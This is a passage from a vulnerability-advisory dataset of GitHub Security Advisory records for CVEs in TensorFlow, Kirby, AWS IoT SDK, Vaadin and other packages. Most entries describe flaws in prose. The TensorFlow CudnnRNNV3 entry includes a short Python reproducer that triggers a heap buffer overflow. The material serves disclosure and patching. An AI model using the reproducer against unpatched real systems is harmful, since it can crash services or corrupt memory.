[{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cq76-mxrc-vchh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41195'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46888'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/pull/51733'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e9c81c1e1a9cd8dd31f4e83676cab61b60658429'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:57:24Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}" +1.4.0,GHSA-vx6v-xg64-pmr8,2021-11-17T21:10:26Z,2021-11-15T23:12:41Z,,['CVE-2021-3945'],Cross-site Scripting in django-helpdesk,django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-helpdesk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3945'}, {'type': 'WEB', 'url': 'https://github.com/django-helpdesk/django-helpdesk/commit/2c7065e0c4296e0c692fb4a7ee19c7357583af30'}, {'type': 'PACKAGE', 'url': 'https://github.com/django-helpdesk/django-helpdesk'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/745f483c-70ed-441f-ab2e-7ac1305439a4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T19:15:55Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}" +1.4.0,GHSA-cq58-r77c-5jjw,2021-11-16T15:49:36Z,2021-11-16T17:04:41Z,,['CVE-2021-41258'],Cross-site scripting (XSS) from image block content in the site frontend,"### Impact + +Kirby's [blocks field](https://getkirby.com/docs/reference/panel/fields/blocks) stores structured data for each block. This data is then used in [block snippets](https://getkirby.com/docs/reference/panel/fields/blocks#block-snippets) to convert the blocks to HTML for use in your templates. We recommend to [escape HTML special characters](https://getkirby.com/docs/guide/templates/escaping) against cross-site scripting (XSS) attacks. + +Cross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the site frontend or Panel session of other users. If the user is logged in to the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim. + +The default snippet for the [image block](https://getkirby.com/docs/reference/panel/blocks/image) unfortunately did not use our escaping helper. This made it possible to include malicious HTML code in the source, alt and link fields of the image block, which would then be displayed on the site frontend and executed in the browsers of site visitors and logged in users who are browsing the site. + +This vulnerability is critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible. + +You are *not* affected if you don't use the blocks field or specifically the image block in any of your blueprints. You are also protected if you use a custom [block snippet](https://getkirby.com/docs/reference/panel/fields/blocks#block-snippets) that either escapes the printed values or doesn't use them. The attack can only be performed by logged-in users and only surfaces in the site frontend (i.e. in your templates). The Panel itself is unaffected and will not execute JavaScript that was injected into the image block content. + +### Patches + +We have patched the vulnerability in [Kirby 3.5.8](https://github.com/getkirby/kirby/releases/tag/3.5.8) by escaping special HTML characters in the output from the default image block snippet. Please update to this or a [later version](https://github.com/getkirby/kirby/releases/) to fix the vulnerability. + +### Credits + +Thanks to Azrul Ikhwan Zulkifli (@azrultech) from BAE Systems AI Vulnerability Research Team for responsibly reporting the identified issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.0'}, {'fixed': '3.5.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/security/advisories/GHSA-cq58-r77c-5jjw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41258'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/pull/3510'}, {'type': 'PACKAGE', 'url': 'https://github.com/getkirby/kirby'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.5.8'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-16T15:49:36Z', 'nvd_published_at': '2021-11-16T18:15:00Z'}" +1.4.0,GHSA-427q-jp8v-ww95,2021-11-22T18:43:54Z,2021-11-23T18:16:50Z,,['CVE-2021-3976'],Cross-site Scripting in kimai2,CSRF related to duplicate action. (the duplication occurs first before redirecting to edit form). This vulnerability is capable of tricking admin users to duplicate teams.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3976'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/b28e9c120c87222e21a238f1b03a609d6a5d506e'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0567048a-118c-42ec-9f94-b55533017406'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:43:54Z', 'nvd_published_at': '2021-11-19T11:15:00Z'}" +1.4.0,GHSA-94jq-q5v2-76wj,2021-12-03T15:21:36Z,2021-11-24T21:02:24Z,,['CVE-2021-40828'],Improper certificate management in AWS IoT Device SDK v2,"Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'aws-iot-device-sdk-v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'awsiotsdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40828'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-cpp-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/aws-c-io/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:33:58Z', 'nvd_published_at': '2021-11-23T00:15:00Z'}" +1.4.0,GHSA-pgcq-h79j-2f69,2021-11-08T22:41:31Z,2021-11-10T19:03:38Z,,['CVE-2021-41206'],Incomplete validation of shapes in multiple TF ops,"### Impact +Several TensorFlow operations are missing validation for the shapes of the tensor arguments involved in the call. Depending on the API, this can result in undefined behavior and segfault or `CHECK`-fail related crashes but in some scenarios writes and reads from heap populated arrays are also possible. + +We have discovered these issues internally via tooling while working on improving/testing GPU op determinism. As such, we don't have reproducers and there will be multiple fixes for these issues. + +### Patches +We have patched the issue in GitHub commits [68422b215e618df5ad375bcdc6d2052e9fd3080a](https://github.com/tensorflow/tensorflow/commit/68422b215e618df5ad375bcdc6d2052e9fd3080a), [4d74d8a00b07441cba090a02e0dd9ed385145bf4](https://github.com/tensorflow/tensorflow/commit/4d74d8a00b07441cba090a02e0dd9ed385145bf4), [579261dcd446385831fe4f7457d802a59685121d](https://github.com/tensorflow/tensorflow/commit/579261dcd446385831fe4f7457d802a59685121d), [da4aad5946be30e5f049920fa076e1f7ef021261](https://github.com/tensorflow/tensorflow/commit/da4aad5946be30e5f049920fa076e1f7ef021261), [4dddb2fd0b01cdd196101afbba6518658a2c9e07](https://github.com/tensorflow/tensorflow/commit/4dddb2fd0b01cdd196101afbba6518658a2c9e07), and [e7f497570abb6b4ae5af4970620cd880e4c0c904](https://github.com/tensorflow/tensorflow/commit/e7f497570abb6b4ae5af4970620cd880e4c0c904). + +These fixes will be included in TensorFlow 2.7.0. We will also cherrypick these commits on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-pgcq-h79j-2f69'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41206'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4d74d8a00b07441cba090a02e0dd9ed385145bf4'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4dddb2fd0b01cdd196101afbba6518658a2c9e07'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/579261dcd446385831fe4f7457d802a59685121d'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/68422b215e618df5ad375bcdc6d2052e9fd3080a'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/da4aad5946be30e5f049920fa076e1f7ef021261'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e7f497570abb6b4ae5af4970620cd880e4c0c904'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-354'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:41:31Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}" +1.4.0,GHSA-93c4-vf86-3rj7,2021-11-04T17:03:36Z,2021-11-03T17:33:32Z,,['CVE-2021-33611'],Reflected cross-site scripting in vaadin-menu-bar webjar resources in Vaadin 14,Missing output sanitization in test sources in `org.webjars.bowergithub.vaadin:vaadin-menu-bar` versions 1.0.0 through 1.2.0 (Vaadin 14.0.0 through 14.4.4) allows remote attackers to execute malicious JavaScript in browser by opening crafted URL.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '14.4.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 14.4.4'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.bowergithub.vaadin:vaadin-menu-bar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.2.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-93c4-vf86-3rj7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33611'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/vaadin-menu-bar/pull/126'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-33611'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T19:53:07Z', 'nvd_published_at': '2021-11-02T10:15:00Z'}" +1.4.0,GHSA-9cq3-fj2h-ggj5,2022-05-04T01:52:12Z,2021-11-02T15:42:31Z,,['CVE-2020-36379'],Vulnerability in remove function leads to arbitrary code execution via filePath parameters,"Aaptjs is a node wraper for aapt. An issue was discovered in the remove function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36379'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:24:54Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}" +1.4.0,GHSA-6mv9-qcx2-3hh3,2021-11-15T14:48:03Z,2021-11-11T00:55:08Z,,['CVE-2021-43174'],Memory exhaustion in routinator,"NLnet Labs Routinator versions 0.9.0 up to and including 0.10.1, support the gzip transfer encoding when querying RRDP repositories. This encoding can be used by an RRDP repository to cause an out-of-memory crash in these versions of Routinator. RRDP uses XML which allows arbitrary amounts of white space in the encoded data. The gzip scheme compresses such white space extremely well, leading to very small compressed files that become huge when being decompressed for further processing, big enough that Routinator runs out of memory when parsing input data waiting for the next XML element.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'routinator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.0'}, {'fixed': '0.10.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43174'}, {'type': 'PACKAGE', 'url': 'https://github.com/NLnetLabs/routinator'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}, {'type': 'WEB', 'url': 'https://www.nlnetlabs.nl/downloads/routinator/CVE-2021-43172_CVE-2021-43173_CVE-2021-43174.txt'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T19:04:55Z', 'nvd_published_at': '2021-11-09T17:15:00Z'}" +1.4.0,GHSA-cqv6-3phm-hcwx,2021-11-08T22:02:26Z,2021-11-10T18:50:17Z,,['CVE-2021-41221'],Access to invalid memory during shape inference in `Cudnn*` ops,"### Impact +The [shape inference code](https://github.com/tensorflow/tensorflow/blob/9ff27787893f76d6971dcd1552eb5270d254f31b/tensorflow/core/ops/cudnn_rnn_ops.cc) for the `Cudnn*` operations in TensorFlow can be tricked into accessing invalid memory, via a heap buffer overflow: + +```python +import tensorflow as tf + +@tf.function +def func(): + return tf.raw_ops.CudnnRNNV3( + input=[0.1, 0.1], + input_h=[0.5], + input_c=[0.1, 0.1, 0.1], + params=[0.5, 0.5], + sequence_lengths=[-1, 0, 1]) + +func() +``` + +This occurs because the ranks of the `input`, `input_h` and `input_c` parameters are not validated, but code assumes they have certain values: + +```cc +auto input_shape = c->input(0); +auto input_h_shape = c->input(1); +auto seq_length = c->Dim(input_shape, 0); +auto batch_size = c->Dim(input_shape, 1); // assumes rank >= 2 +auto num_units = c->Dim(input_h_shape, 2); // assumes rank >= 3 +``` + +### Patches +We have patched the issue in GitHub commit [af5fcebb37c8b5d71c237f4e59c6477015c78ce6](https://github.com/tensorflow/tensorflow/commit/af5fcebb37c8b5d71c237f4e59c6477015c78ce6). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cqv6-3phm-hcwx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41221'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/af5fcebb37c8b5d71c237f4e59c6477015c78ce6'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:02:26Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-x7j7-qp7j-hw3q,2021-11-16T15:46:57Z,2021-11-16T17:04:19Z,,['CVE-2021-41252'],Cross-site scripting (XSS) from writer field content in the site frontend,"### Impact + +Kirby's [writer field](https://getkirby.com/docs/reference/panel/fields/writer) stores its formatted content as HTML code. Unlike with other field types, it is not possible to [escape HTML special characters](https://getkirby.com/docs/guide/templates/escaping) against cross-site scripting (XSS) attacks, otherwise the formatting would be lost. + +Cross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the site frontend or Panel session of other users. If the user is logged in to the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim. + +Because the writer field did not securely sanitize its contents on save, it was possible to inject malicious HTML code into the content file by sending it to Kirby's API directly without using the Panel. This malicious HTML code would then be displayed on the site frontend and executed in the browsers of site visitors and logged in users who are browsing the site. + +This vulnerability is critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible. + +You are *not* affected if you don't use the writer field in any of your blueprints. The attack can only be performed by logged-in users and only surfaces in the site frontend (i.e. in your templates). The Panel itself is unaffected and will not execute JavaScript that was injected into writer field content. + +### Patches + +We have patched the vulnerability in [Kirby 3.5.8](https://github.com/getkirby/kirby/releases/tag/3.5.8) by sanitizing all writer field contents on the backend whenever the content is modified via Kirby's API. Please update to this or a [later version](https://github.com/getkirby/kirby/releases/) to fix the vulnerability. + +### Credits + +Thanks to Azrul Ikhwan Zulkifli (@azrultech) from BAE Systems AI Vulnerability Research Team for responsibly reporting the identified issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.0'}, {'fixed': '3.5.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/security/advisories/GHSA-x7j7-qp7j-hw3q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41252'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/commit/25fc5c6b330442e6433c99befc688f3698c5d1fc'}, {'type': 'PACKAGE', 'url': 'https://github.com/getkirby/kirby'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.5.8'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-16T15:46:57Z', 'nvd_published_at': '2021-11-16T18:15:00Z'}" +1.4.0,GHSA-533p-cp2g-99wp,2021-11-17T21:12:46Z,2021-11-15T23:19:09Z,,['CVE-2021-3931'],snipe-it is vulnerable to Cross-Site Request Forgery (CSRF),snipe-it is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3931'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/0d811d067c8e064252c0143c39d6cd4c3133679e'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/03b21d69-3bf5-4b2f-a2cf-872dd677a68f'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T21:09:15Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}" +1.4.0,GHSA-4r9c-jghc-cx5m,2021-11-08T21:26:37Z,2021-11-10T16:45:34Z,,['CVE-2021-25978'],Cross-site Scripting in apostrophe,"Apostrophe CMS versions between 2.63.0 to 3.3.1 are vulnerable to Stored XSS where an editor uploads an SVG file that contains malicious JavaScript onto the Images module, which triggers XSS once viewed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'apostrophe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.63.0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25978'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/apostrophe/commit/c8b94ee9c79468f1ce28e31966cb0e0839165e59'}, {'type': 'PACKAGE', 'url': 'https://github.com/apostrophecms/apostrophe'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:26:37Z', 'nvd_published_at': '2021-11-07T18:15:00Z'}" +1.4.0,GHSA-j3f7-7rmc-6wqj,2021-12-03T15:22:22Z,2021-11-24T20:35:03Z,,['CVE-2021-40831'],Improper certificate management in AWS IoT Device SDK v2,"The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is also not enabled when the CA has been “overridden”. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'aws-iot-device-sdk-v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'awsiotsdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 